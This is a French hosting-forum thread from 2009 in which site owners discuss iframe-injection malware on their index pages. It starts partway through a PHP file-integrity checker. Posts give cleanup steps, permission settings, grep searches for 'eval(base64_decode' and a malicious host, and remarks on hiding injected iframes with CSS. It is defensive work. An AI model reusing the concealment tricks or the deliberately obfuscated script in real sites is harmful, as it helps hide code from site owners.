        mail("__DEST__","[!!] Site compromis","http://".$_SERVER[\'SERVER_NAME\']."\n\nLes fichiers suivant on été modifié :\n\n".$modif);
    }

    die(\'Erreur : L\\\'intégrité de certains fichiers du site a été compromis.\'); // On stope tout pour protéger les visiteurs.
}'
;
         
if (isset(
$_POST['fichier']) && is_array($_POST['fichier']) && isset($_POST['mail'])) // Si le form est validé
{
    
$sum_txt_name 'sum.txt';
    
// Génération aléatoire du nom du fichier de véritication
    
do { $check_php_name str_shuffle(preg_replace("/[0-9]/",'',substr(md5(rand()),-8).str_rot13(substr(md5(rand()),-8)))).'.php'; } while(is_file($check_php_name));
    
    
//Création du futur fichier 'sum.txt':
    
$sum_txt '';
    foreach(
$_POST['fichier'] as $fichier)
        
$sum_txt .= $fichier.';'.md5_file($fichier)."\n";
    
    
    
$size_sum  strlen($sum_txt)+33+strlen($check_php_name);
    
$check_php str_replace(array('__DEST__','__SUM__','__SIZE__'), array($_POST['mail'], $sum_txt_name$size_sum),$check_php);
    
$check_php '.base64_encode($check_php).'\')); ?>';
    
    
$sum_txt .= $check_php_name.';'.md5($check_php)."\n";
    
    
//Ecriture des fichiers
    
$res file_put_contents($check_php_name,$check_php);
           
file_put_contents($sum_txt_name,substr($sum_txt,0,-1));
           
file_put_contents('time.tmp','');

    if(
$res)
        echo 
'[ok] Fichier de vérification automatique : .$check_php_name.'" target="_blank">'.$check_php_name.'
'
            
.'[ok] Fichier contenant les hash : .$sum_txt_name.'" target="_blank">'.$sum_txt_name.'';
    else
        echo 
'[ko] Une erreur c\'est produite !';
}

function 
scandir_r($dossier '.')
{
    global 
$imgDir;
    
    
$dirTrie = array();
    
    
$dir scandir($dossier);
    
    foreach(
$dir as $res// On trie les fichier en premier suivit des dossier, question d'afficahge
        
if (is_dir($res))
            
array_push($dirTrie,$res);
        else
            
array_unshift($dirTrie,$res);
        
    echo 
'
.$imgDir.'">'.$dossier;
    
    foreach(
$dirTrie as $res)
    {
        
$path $dossier.'/'.$res;
        if (
$res != '.' && $res != '..')
        {
            if (
is_dir($path))
                
scandir_r($path);
            else
                echo 
'
.((preg_match("/index/i",$res)) ? 'class="index" ' '').'type="checkbox" value="'.$path.'"> '.$res;
        }
    }
    
    echo 
'
';
}

if (!
is_writable('.')) echo '!! Le dossier doit avoir les droit d\'écriture
';
if (
file_exists('time.tmp') && !is_writable('time.tmp')) echo '!! Le fichier time.tmp doit avoir les droit d\'écriture
';

echo 
'


Sélectionner tout les index
'
;

echo 
'';

scandir_r();

echo 
'
Votre mail : 

';

?>
(Bien sur, c'est qu'une ébauche, on peu faire encore plus poussé)
Principe de fonctionnement :

4 Fichiers utilisé en tout :
- checkSetup.php : la base, le script qui génère les autres fichiers, où vous sélectionnez les fichiers a vérifier (index & co)
- time.tmp : contient la date de la dernière erreur trouvé (pour éviter de recevoir des dizaine de mail)
- sum.txt : contient l'emplacement du/des fichier a vérifier ainsi que sa signature
- $aleatoire.php : le script qui effectuera les vérifications (appel direct : page blanche = tout est ok, sinon die(site fermé); )

Dans la fourbitude la plus totale, j'ai fait en sorte que le système soit pas ou peu 'détectable', le fichier principal a un nom aléatoire, et sa source n'est pas lisible au premier coup d'œil, 'sum.txt' contiens les hash et sert de honeypot (pigeon), vu que son intégrité est aussi vérifié .


Niveau cron, pour les personnes qui n'en ont pas envi, suffit d'inclure $aleatoire.php dans l'index principal et ajouter quelques lignes pour faire une vérifications que toutes les x heures :

Code PHP:
    $time = @file_get_contents("time2.tmp");
    if (
$time === false || !is_numeric($time) || $time time()-(60*60)) // Remplacez 60*60 par la duré maximale en seconde séparant 2 vérifications
    
{
        
file_put_contents("time2.tmp",time());
        include(
"monfciherdeverif.php");
    } 
Donc toutes les heures (ou moins si vous avez pas de visiteurs en continu) le script sera exécute, bien sur dans ce cas, il vaut mieux pour l'utilisateur que la liste des fichiers à vérifier ne soit pas trop longue...

The END

neuro666
28/08/2009, 11h21
J'ai trouvé une petite commande sur http://blog.unmaskparasites.com/2009...eta-redirects/
Code:
grep -H “eval(base64_decode” /var/www/vhosts/* -R | cut -d: -f1 > /tmp/results_scan
Quelqu'un peut expliquer ce que fait exactement cette commande svp.
D'après ce que je suppose, ça déplace tous les fichiers qui contiennent des lignes en base 64 mais je ne suis pas sur, je voudrais juste voir les emplacements sans les supprimer ou déplacer.
Merci.

Edit*
J'ai testé le script de "enycu", ça tourne très très bien.

cassiopee
27/08/2009, 09h54
On peut aussi utiliser des outils tout fait pour vérifier l'intégrité des fichiers
(s'assurer que le contenu n'a pas été altéré, que ça soit des scripts PHP
ou n'importe quel autre fichier du système) .

Voir là par exemple : http://forums.ovh.com/showpost.php?p...0&postcount=91

enycu
27/08/2009, 09h30
D'une manière générale, on peut vérifier la date d'ajout et de modification des fichiers sur le serveur. On voit de suite si un fichier a été modifié depuis x jours. J'ai fait un script dans ce sens:
http://forum.ovh.com/showpost.php?p=104517

Equilibrius
27/08/2009, 00h34
tu vas devenir riche et célèbre !
Que demander de plus !

J'ai encore quelques jours de vacances devant moi, je posterai dans le courant de la semaine

Ps : je prend aussi les CB.

chbj
27/08/2009, 00h00
Equilibrius; si tu as le temps, je pense que ce serait une excellente idée de poster ton script. De cette manière, on pourrait éventuellement y collaborer, et, de toutes façons, ce serait très utile !

Voilà, tu vas devenir riche et célèbre !

Equilibrius
26/08/2009, 04h26
Couplé a un cron et le tour est joué comme tu le dit, pour camoufler le système, on peux imaginer ceci :
Code PHP:
eval(base64_decode("le_code_php_passé_à_base64_encode")); ?>
Niveau Alerte on peu aller encore plus loin, en envoyant des sms par exemple

Si quelqu'un voudrait réaliser un système de ce style sur son site, mais n'a pas forcement toutes les connaissances pour, je veux bien poster un script plus poussé sur demande.

chbj
25/08/2009, 21h03
Excellente idée, Equilibrius ! J'ajouterai ça au How-To prochainement. Il faudra un script plus élaboré évidemment.

Donc, ce que propose Equilibrius :

Est une mesure d'avertissement de contamination.

Cette mesure permet d'éviter l'examen manuel des fichiers.

Elle ne constitue PAS une mesure de protection contre la contamination.


La procédure est la suivante :

Pour tous les fichers critiques, notamment les index mais aussi ceux servant à générer les pages index dans les systèmes de templates de CMS, forums, etc., on crée un HASH (signature, ici, avec md5_file, ce sera un nombre de 32 caractères hexadécimaux) pour le fichier.

On garde trace de cette signature chez soi pour plus dé sécurité.

On fait un script - aussi bien dissimulé que possible- qui recalcule le HASH de chaque fichier régulièrement (par une tâche CRON par exemple) et qui va comparer ce HASH à celui que l'on avait obtenu.

En cas de différence, le script vous prévient par email, ou par un autre moyen. (Possibilité de faire des choses plus compliquées évidemment.)

Vous vérifiez ce qui s'est passé.

Equilibrius
25/08/2009, 19h20
Bonjour tout le monde, je connais une personne qui a été infecté aussi, elle avait aussi filezilla, soit dit en passant, filezilla est une cible de choix, tout les login & pass sont stocké en clair dans un vulgaire fichier xml...

Désolé j'ai pas eu le temps de tout lire, mais j'ai pensé a un système assez simple pour vérifier l'intégrité de n'importe quel ficher :

Inclure un fichier 'check.php' par ex. dans votre index (ou tout autre fichiers) :
Code PHP:

if (md5_file("index.php") != "1e7f5e4ca4db2266c1d5fc4aa003931f")
    
mail("moi@gmail.com","Site Modifié !","Le site xxx.com a été modifié !");

?>
pour obtenir 1e7f5e4ca4db2266c1d5fc4aa003931f, il suffit de faire : echo md5_file("index.php"); // (ne pa mettre ce code dans l'index, sinon le hash sera modifier une foi le code supprimé xd)

C'est juste une base, il est évident qu'il ne faut pas faire juste un mail(); (déjà pour éviter d'être floodé xD), on peu imaginer un système de restauration automatique, ou fermer le site automatiquement en cas de modification ect... je réinvente peut-être le fil a couper le beurre, dsl si j'ai raté des posts qui traitais de cette solution.

chbj
22/08/2009, 19h19
J'ai modifié le How-To pour y incorporer divers réponses que j'ai faîtes sur des points importants et d'autres ajouts.

22 août 2009 :
- ajout d'information sur les caches des navigateurs,
- les pages mises en cache sur le FTP par les CMS, forums, etc.,
- la sécurité par modification des droits sur les fichiers et dossiers,
- usage de clients FTP Linux,
- divers petits changements

chbj
19/08/2009, 13h52
Citation Envoyé par Arlacais
A noter que depuis que j'ai mis TOUS mes fichiers index.yyy en lecture seule , ( soit en 444 ) plus de problème avec eux
D'où mon conseil sur les permissions dans
http://forum.ovh.com/showpost.php?p=301965&postcount=19 (voir les autres ! )
Bon, d'accord, il faut vraiment que je l'intègre dans mon How-To.

Citation Envoyé par Arlacais
A voir cette page et l'utilisation d'un script scan_files.php
http://www.danielansari.com/wordpres...martuz-trojan/
Pas fini de tester l'efficacité .
Je vais lire ça, merci du lien.

Arlacais
18/08/2009, 21h20
Bonsoir,

Mes fichiers infectés sont des index.php, index.htm ou html , même des fichiers index_xxxx.yyy
Puis des fichiers defaut.php , defaut_access.php et maintenance.php

A noter que depuis que j'ai mis TOUS mes fichiers index.yyy en lecture seule ,
( soit en 444 ) plus de problème avec eux

Important, absent 4 jours, PC éteint , aucune attaque
Premier problème 1heure après avoir rallumé le PC.
Je soupçonne Fillezilla, pourtant j'ai changé le MdP de FTP depuis un autre PC

Passé le PC avec Avast, Ccleaner, et MalwareBytes

A voir cette page et l'utilisation d'un script scan_files.php
http://www.danielansari.com/wordpres...martuz-trojan/
Pas fini de tester l'efficacité .

Ca commence à me .....
A+
Christian

chbj
18/08/2009, 00h12
Citation Envoyé par masterboy
Bof bof le coup de l'iframe invisible, si tu met une iframe avec 0px sur 0px tu auras la même chose, à part un micro carré noir pratiquement indétectable.
Je parle de ce qui existe, des codes que l'on trouve et qui piègent actuellement des dizaines de milliers de sites. Je ne donne pas de conseils pour les Nuisibles ! Cela dit, ton point noir sur fond blanc... Le choix entre invisible et presque invisible est vite fait !

Citation Envoyé par masterboy
Quand tu parles "qu'on peut évidemment faire plus sophistiqué !" tu fais allusion à quoi comme procéder de camouflage ?
Par ce que là je ne voix pas ce qu'on peut faire de plus ...
Lire le How-to et voir comment on utilise function par exemple.

masterboy
17/08/2009, 23h02
Citation Envoyé par chbj
Il suffit d'un tag de CSS style="visibility: hidden". Tu as l'exemple dans le code-type en une ligne que je donne au début.

Par exemple :
Code:
est un iframe visible, mais
Code:
est un iframe invisible. Il suffit ensuite qu'il soit bien placé dans la page, mais on peut évidemment faire plus sophistiqué !




Le code, par définition, sera toujours visible. C'est l'iframe qui peut être dissimulé. Toutefois, comme expliqué dans mon How-To, le code peut être habilement dissimulé et ne plus être la simple ligne citée dans mon premier example.

Toutefois, si l'injection du code malveillant supprime du "bon" code sur la page, c'est que l'on a affaire à quelqu'un de peu doué (mais le code reste dangereux), car, par principe, un système viral malveillant ne doit pas éveiller les soupçons du propriétaire de site.

Edit 5 août 2009: typographie

Bof bof le coup de l'iframe invisible, si tu met une iframe avec 0px sur 0px tu auras la même chose, à part un micro carré noir pratiquement indétectable.

Quand tu parles "qu'on peut évidemment faire plus sophistiqué !" tu fais allusion à quoi comme procéder de camouflage ?
Par ce que là je ne voix pas ce qu'on peut faire de plus ...

chbj
17/08/2009, 02h41
Evidemment non, OVH n'est pas le seul touché ! Tout le web est touché. Le Suisse que tu cites, Servage, Planethoster, tous les autres, et les sites hébergés sur dédiés... Tout le monde.

Maintenant, si tu veux LA méthode... Il n'y en a pas. Ce que je connais, c'est ce que j'ai mis dans le How-To et quelques postes qui suivent. C'est long et c'est pas drôle.

danielb
17/08/2009, 01h34
Ces attaques ne se font pas que sur OVH, infomaniak également.

J'ai comme vous le même problème, je suis ne suis pas très patient avec les virus si les méthodes traditionnelles ne fonctionnent pas je formate win-merde et je réinstalle. Mais dans ce cas avec ces toyans ( qui visiblement apporte leurs amis toyan ).

si vous avez LA méthode pour les supprimer ... ...

Amicalement a vous tous ...

chbj
16/08/2009, 16h28
Citation Envoyé par Dreossk
Ok, je vais attendre d'avoir des fichiers indésirables avant de faire ça. Merci chbj!

Pas de quoi. Mais, bon, évidemment, si tu trrouve des fichiers indésirables, c'est que tu auras été infecté et que ces fichiers auront peut-être déjà commencé leur travail nuisible.

Dreossk
16/08/2009, 00h30
Ok, je vais attendre d'avoir des fichiers indésirables avant de faire ça. Merci chbj!

chbj
15/08/2009, 23h13
Citation Envoyé par Dreossk
Finalement il restait des virus sur mon PC. Un scan antivirus a révélé des virus dont je n'avais pas été informé lors de l'apparition.
D'une certaine manière, je suis soulagé, parce que, maintenant, la situation est coherente !


Citation Envoyé par Dreossk
Est-ce vraiment nécessaire de modifier les dossiers pour 505? Déjà qu'à chaque fois que je veux modifier un fichier html je dois changer ses droits, je ne veux pas en plus à avoir à modifier tous les dossier en haut. De toute façon c'est le fichier html qui est modifié par le virus, pas les dossiers donc quelle est l'utilité?.
Nécessaire, non... c'est une bonne (et ennuyeuse) mesure en général et appropriée en temps de crise.

A quoi cela sert-il ? Eh bien, un pirate va tenter de manière automatisée ou manuelle de trouver un moyen d'accéder à ton site. Ensuite, il va chercher à uploader et/ou modifier des fichiers. Avec tes fichiers en 404, il ne peut pas les modifier. Mais il peut uploader ! Avec des dossiers en 505, il ne peut pas uploader. Maintenant, évidemment, s'il a obtenu les codes FTP, il peut faire ce qu'il veut, mais avec une nuance toutefois : si son procédé est plutôt automatisé, il peut buter sur des permissions restrictives. Cela dépend de comment il est fait.

Dreossk
15/08/2009, 16h23
Finalement il restait des virus sur mon PC. Un scan antivirus a révélé des virus dont je n'avais pas été informé lors de l'apparition.

J'ai fais un ménage:
- Désinstallation de Flash Player, Acrobat Reader et FileZilla
- Destruction de tout ce qui est relié à ces trois logiciels
- Scan avec Spybot, Ad-Aware, Malwarebytes et Antivir (2 fois)
- Changement de mot de passe ftp pour la 3e fois
- Installation de Flash Player et FileZilla (j'ai pas besoin de acrobat en fait)
- Nettoyage de tous les fichiers index.html
- Ajout d'une option pour utiliser autre chose que index.html dans mon .htaccess
- Changement du nom de tous les index.html avec le nom de la nouvelle nomenclature
- Changement des droits de tous ces fichiers html pour 444 et du .htaccess pour 404
- De plus je vais maintenant utiliser Orca Browser (moteur FireFox) avec Adblock Plus, Flashblock et NoScript au lieu de Avant Browser (moteur IE)

Est-ce vraiment nécessaire de modifier les dossiers pour 505? Déjà qu'à chaque fois que je veux modifier un fichier html je dois changer ses droits, je ne veux pas en plus à avoir à modifier tous les dossier en haut. De toute façon c'est le fichier html qui est modifié par le virus, pas les dossiers donc quelle est l'utilité?

J'ai aussi fais un dossier test avec un fichier index.html non protégé (droits 604), un fichier index.html protégé (droits 444) et un fichier html (droits 604) avec la nouvelle nomenclature décrite dans le .htaccess.

Je vais voir ce que ça donne. Si ça revient, la prochaine étape c'est une VM Linux...

chbj
15/08/2009, 15h38
Je ne complète pas pour l'instant mon How-To, déjà long, non pas parce que l'on manque d'informations sur ces attaques... mais parce que l'on en reçoit trop, très partielles, et contradictoires parfois. Il faut trier et comparer.

Mais, voici une série de points supplémentaires ou de rappels qui peuvent aider :

- Si vous vous contentez de chercher "iframe", vous êtes perdants. Comme précisé dans le How-To, il faut aussi, par exemple, chercher " “(function(“ "

- Videz les caches de votre navigateur quand vous nettoyez votre système ou suspectez une attaque

- Quand vous nettoyez votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.) Et n'oubliez pas le pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.

- Vérifiez TOUS les PC... tous. Un seul contaminé, et ça repart.

- Mettez à jour vos CMS, forums, etc.

- Eliminez tous les fichiers inutiles de votre PC

- Utilisez éventuellement Linux pour faire du FTP (divers clients FTP disponibles). Ce n'est pas que Linux soit invulnérable (après tout, le premier virus "Ver" de l'histoire de l'informatique était sous Unix), c'est seulement que les créateurs de sytèmes viraux pour PC privilégient les systèmes les plus répandus, et donc Windows. C'est plus rentable.


Citation Envoyé par Lecaramel
y'a pas de log par défaut avec le firewall de windows, il faut l'activer (centre de sécurité> avancé). Bref, aucune trace des évennements passés
Horreur et consternation. Cela dit, le firewall de windows marche correctement, bien qu'extrêmement basique. Tu pourrais envisager ZoneAlarm (version gratuite), tout de même plus complet et également basé sur une logique d'autorisation par application. Ensuite, il y a d'autres produits qui gèrent aussi les logiques par ports, services, etc. (Mais mieux vaut un firewall simple qu'un firewall sophistiqué mal configuré comme dans 50% des cas.)


Citation Envoyé par Dreossk
C'est peut-être stupide comme question mais si je me fais une VM Linux Ubuntu et que je m'en sert uniquement pour aller sur mon FTP OVH avec Filezilla, est-ce que c'est sécuritaire? Parce que ça fait trois fois que j'ai ce problème sur mon site et que je n'ai aucun virus sur mon PC Windows.
TOUS ( t o u s ) les PC sont sûrs ? Sûrs de sûrs ? Alors il pourrait y avoir une attaque par une faiblesse de tes sites. C'est d'ailleurs beaucoup plus classique.

Vaste sujet. Néanmoins une mesure de sécurité de base consiste à modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage. C'est légèrement pénible...

Sauf impossibilité technique :
- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.
* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :
- Passer les fichiers en 604
- Passer les dossiers en 705
et, quand vous avez fini, remettez 404 et 505.


Citation Envoyé par hydre
je vais installer un poste sous un linux ou un unix dont la seule fonction sera les transferts ftp.
Oui, cela peut aider à la sécurité, voir plus haut dans ce fil.



Citation Envoyé par hydre
Bon, on aurait aussi la solution server side, qu'un applicatif de notre hébergeur n'autorise une session ftp qu'après qu'on ait indiqué dans le manager (qui est sous SSL) l'adresse IP autorisée.
Tout à fait, avec évidemment possibilité de changer à chaque fois (IP non fixe, voyages, etc.)

hydre
15/08/2009, 01h29
Depuis le 11 août, j'ai eu a faire le ménage quatre fois, et autant de changements de mots de passe ftp.

Là, ce 14 août, je suis passé juste après les robots spammer en iframe (impressionnant le nombre d'adresses IP réelles ou zombie utilisées !), pour modifier les vrais index (ceux qui sont accessibles pour l'internaute normal), j'ai laissé les autres, que je vais corriger en utilisant une solution que j'espère radicale :

je vais installer un poste sous un linux ou un unix dont la seule fonction sera les transferts ftp. Je ne remets pas en service avec les nouveaux MDP mon ftp actuel (ws_ftp) sous XP, ce serait avoir une fois de plus à restaurer les pages modifiées des sites (chez OVH, mais aussi ailleurs).

Je crois que la solution poste linux uniquement utilisé en application FTP pour la MAJ des sites distants (un vieux PC avec une carte réseau suffit) me paraît pour l'oeuvre la plus sûre : je vais voir. J'ai assez perdu de temps avec ces attaques et je n'ai pas envie de me faire blacklister par Google, ce qui serait un préjudice considérable.

Pour les failles CMS, je ne sais pas encore me prononcer. Pour Spip, j'utilise la version proposée par OVH, pour forum, une version stable de phpBB, et le reste est en pages statiques ou en scripts que j'héberge physiquement ailleurs.
C'est un cauchemar cette nouvelle vague d'attaques :-((

Bon, on aurait aussi la solution server side, qu'un applicatif de notre hébergeur n'autorise une session ftp qu'après qu'on ait indiqué dans le manager (qui est sous SSL) l'adresse IP autorisée. Perso je rentre à chaque fois mes identifiants login et pw, ils ne sont stockés nulle part. Certes, après il y aurait le problème keyloger (c'est pour ça que les banques passent par d'autres scripts à la souris sur pavé numérique ou alphanumérique pour les pw, malgré le ssl).

Dreossk
14/08/2009, 21h47
C'est peut-être stupide comme question mais si je me fais une VM Linux Ubuntu et que je m'en sert uniquement pour aller sur mon FTP OVH avec Filezilla, est-ce que c'est sécuritaire? Parce que ça fait trois fois que j'ai ce problème sur mon site et que je n'ai aucun virus sur mon PC Windows.

Lecaramel
14/08/2009, 15h00
Pour ceux que ça intéresse, y'a pas de log par défaut avec le firewall de windows, il faut l'activer (centre de sécurité> avancé). Bref, aucune trace des évennements passés, on verra pour les futurs.

Lecaramel
14/08/2009, 14h54
Seul deux PCs ont accès à ces sites, celui du boulot et celui chez moi à la maison. j'ai bien sur fait les maj des antivirus (elles sont faites tous les jours), c'est ce que je trouve assez troublant.
Aucune autre personne n'a accès aux sites web que moi
J'ai aussi tenté Spoybot S&D (que des cookies trouvés, le truc classique)

Depuis le nettoyage des sites et le changement des pass, pas de nouvelle infection, mais je n'ai pas tenté de me reconnecter depuis ces deux PCs.

Je vais regarder les logs des firewall.. sauf que bon, j'utilise celui de Windows, en espérant trouver des logs (m'en vais demander à Google)

Question bête, n'est il pas possible de chopper une variante qui réside en mémoire tout simplement et une fois le PC rebooté, plus de trace ? Je n'ai eu que des modifications par iframe, assez simple à trouver, mais de code offusqué et autre choses sympatiques.

Si je ne trouve rien, je vais formater et réinstaller windoze, ça sera l'occasion d'installer Win7..

chbj
14/08/2009, 14h41
Citation Envoyé par Lecaramel
En attendant, je ne sais toujours pas quelle machine a été infectée. AVG n'a rien trouvé, Avast non plus, mawarebytes' Anti-Malaware non plus..
Je me suis connecté depuis le Mac, mais je ne trouve rien sur les PCs. Quelqu'un connait un antivirus efficace contre ce virus/spyware ?
Comme je le disais dans le How-To, un anti-virus ne vaut que ce que valent ses mises à jour, pas de miracle. Si, à la fois, AVAST et AVG, mis à jour (!), ne détectent rien maintenant et toujours rien après quelques mises à jour de plus sur quelques jours, je tendrais à penser que le PC testé n'est pas infecté et que la source est ailleurs. Pour autant, on peut vérifier ce qui se passe sur ton PC avec le firewall dans les logs de celui-ci : voit-on des connexions ou tentatives de connexion vers l'extérieur qui soient anormales ?

Essaye aussi Spybot Search & Destroy

Ton site est-il de nouveau contaminé ou pas ?

Les PC de tes collaborateurs ou autres PC que tu utilises ont-ils été vérifiés ?

Tes mots de passe FTP ont-ils été changés ?

D'autre part, tous les logiciels qui servent à administrer / modifier / etc des sites ou installations distantes doivent toujours être en "autorisation de connexion à demander" sur le firewall, jamais en "toujours permis". (Et cela ne constitue évidemment pas une protection absolue !)

Lecaramel
14/08/2009, 12h37
En attendant, je ne sais toujours pas quelle machine a été infectée. AVG n'a rien trouvé, Avast non plus, mawarebytes' Anti-Malaware non plus..
Je me suis connecté depuis le Mac, mais je ne trouve rien sur les PCs. Quelqu'un connait un antivirus efficace contre ce virus/spyware ?

chbj
13/08/2009, 16h33
Citation Envoyé par Lecaramel
Pour chercher les fichiers incriminés, j'ai fait :
Code:
grep -nri "http://c6p.at:8080" *
grep -nri "
est un iframe visible, mais
Code:
est un iframe invisible. Il suffit ensuite qu'il soit bien placé dans la page, mais on peut évidemment faire plus sophistiqué !


Citation Envoyé par lifedaniel
Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.
Le code, par définition, sera toujours visible. C'est l'iframe qui peut être dissimulé. Toutefois, comme expliqué dans mon How-To, le code peut être habilement dissimulé et ne plus être la simple ligne citée dans mon premier example.

Toutefois, si l'injection du code malveillant supprime du "bon" code sur la page, c'est que l'on a affaire à quelqu'un de peu doué (mais le code reste dangereux), car, par principe, un système viral malveillant ne doit pas éveiller les soupçons du propriétaire de site.

Edit 5 août 2009: typographie

lifedaniel
05/08/2009, 00h10
Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.

masterboy
04/08/2009, 22h15
Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !
Je ne comprend pas comment l'iframe peut être invisible, tu veux dire que la taille est de 0 pixel sur 0 pixel et que donc personne ne peut la voir sauf dans le code source ? Donc le script de la page appelé s'effectue sans qu'on voit cette page ?

chbj
04/08/2009, 16h52
Citation Envoyé par cbfr
le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.
Merci cbfr. J'avais oublié de mentionner dans le How-to ce que j'avais dit dans une réponse quelque part : Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
http://notepad-plus.sourceforge.net/uk/site.htm


Pour fseeker, en fait File Seeker, que tu mentionnes, voilà le lien pour les lecteurs du forum :
http://www.softpedia.com/get/System/...e-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)

Sinon, il y a un programme payant (pas trop cher pour une "Personal Home License")

HandyFile Find and Replace - Text Workbench version
http://www.silveragesoftware.com/sea...text-tool.html

Si quelqu'un connaît autre chose, moins cher ou éventuellement gratuit... suggestions bienvenues !


J'édite le How-To avec ces informations.

cbfr
31/07/2009, 12h59
- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)
le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.

Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to

chbj
23/07/2009, 16h14
Note accessoire :
Vous pouvez éventuellement, si cela vous convient, et avec les réserves d'usage, utiliser le lecteur de PDF Foxit, au lieu du lecteur "originel" d'Adobe. (Les logiciels "officiels" sont généralement plus attaqués que les logiciels "alternatifs".) Il existe une version gratuite.
http://www.foxitsoftware.com/pdf/reader/
(Logiciel suggéré par Daweb)

chbj
21/07/2009, 16h55
Suite du post précédent

3) Appliquez une (pénible) mesure de sécurité de base consistant à modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage, sauf impossibilité technique :
[INDENT]- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.
* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :
- Passer les fichiers en 604
- Passer les dossiers en 705
et, quand vous avez fini, remettez 404 et 505.
Si vous ne voulez pas le faire pour tous les fichiers, faîtes-le au moins pour les fichiers index.* Ce sera mieux que rien.

4) Mesure éventuelle de sécurité supplémentaire :
Si vous n'êtes pas sûrs de votre sécurité FTP sur votre PC, utilisez éventuellement Linux pour faire du FTP (divers clients FTP disponibles). Ce n'est pas que Linux soit invulnérable (après tout, le premier virus "Ver" de l'histoire de l'informatique était sous Unix), c'est seulement que les créateurs de sytèmes viraux pour PC privilégient les systèmes les plus répandus, et donc Windows. C'est plus rentable



Références (parmi d'autres), en anglais :




Détection éventuelle d’une contagion future par la méthode du "pot de miel" ("honeypot") :

On a vu que les codes malicieux étaient de plus en plus complexes et donc difficile à repérer dans des pages elles-mêmes complexes, comme c’est souvent le cas maintenant sur le web.

Toutefois, les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc.

Il est donc -sans garantie absolue de réussite- possible de créer des pages « index » témoins extrêmement simples et facile à lire, avec juste le code minimal d’une page html ou php, etc. à des endroits où elles ne servent à rien.

Par exemple, si votre vrai index est index.php, créez un index.html, etc. (Attention, vous pouvez avoir besoin de configurer un fichier .htaccess pour être bien sûr que votre site continuera à utiliser le bon index ! Se reporter aux documentations appropriées.)

Vous pouvez aussi placer des pages index dans des dossiers volontairement vides. (Même remarque que ci-dessus : veillez aux règles sur les pages index.)

Avec un peu de chance, le système viral sera « attiré » par ces fausses pages index (abeilles et pot de miel) et les infectera toutes. Or, vos pages témoins sont faciles à lire. Dans ce cas, vous pourrez vous rendre compte de l’attaque, et, en prime, voir clairement le code utilisé !

Attention : on ne peut évidemment pas garantir le succès de cette méthode.



Note importante :

Ainsi que je l'ai dit, rien n'empêcherait d'utiliser d'autres logiciels que ceux cités ici pour réaliser le même type de contamination. Il est même vraisemblable que cela sera essayé tôt ou tard ou même l'a peut-être déja été. Il est donc absolument impératif d'utiliser des anti-virus ET des anti-malware à jour ET de veiller à la mise à jour de vos plug-ins de navigateurs et dispositifs similaires..

Dans le cas où, sur des PC suspects, un anti-virus ne donne rien, il peut être judicieux de le désinstaller et en installer un autre pour faire un nouveau test. (Désinstaller n'est pas strictement obligatoire, mais généralement les anti-virus cohabitent mal.)



Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés

(Ajouté le 6 octobre 2009, au stade de semi-beta de la page/)


Firefox 3.5.3 et 3.0.14 pouvaient vous avertir des plug-ins Adobe Flash Player, ici:
http://en-us.www.mozilla.com/en-US/f....5.3/whatsnew/
toutefois Mozilla a décidé d'aller plus loin.

Face aux problèmes causés par l'utilisation de failles de sécurité dans les Plug-ins périmés (notamment Adobe Flash Player, voir le How-To), Mozilla vient d'ouvrir une page semi-beta permettant de savoir quels sont vos plug-ins périmés et de les mettre à jour.

Voici l'annonce:
http://blog.mozilla.com/webdev/2009/...eds-your-help/

Et voici la page:
https://www-trunk.stage.mozilla.com/en-US/plugincheck/

Attention, vous aurez un avertissement de sécurité à cause d'un certificat qui ne fonctionne pas au moment d'écrire ces lignes. (Bien joué, Mozilla! )
Il faut utiliser la fonction "ajouter une exception" pour utiliser cette page de détection des plug-ins.







Logiciels permettant la recherche d'une chaîne de caractères sur plusieurs fichiers à la fois :

Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
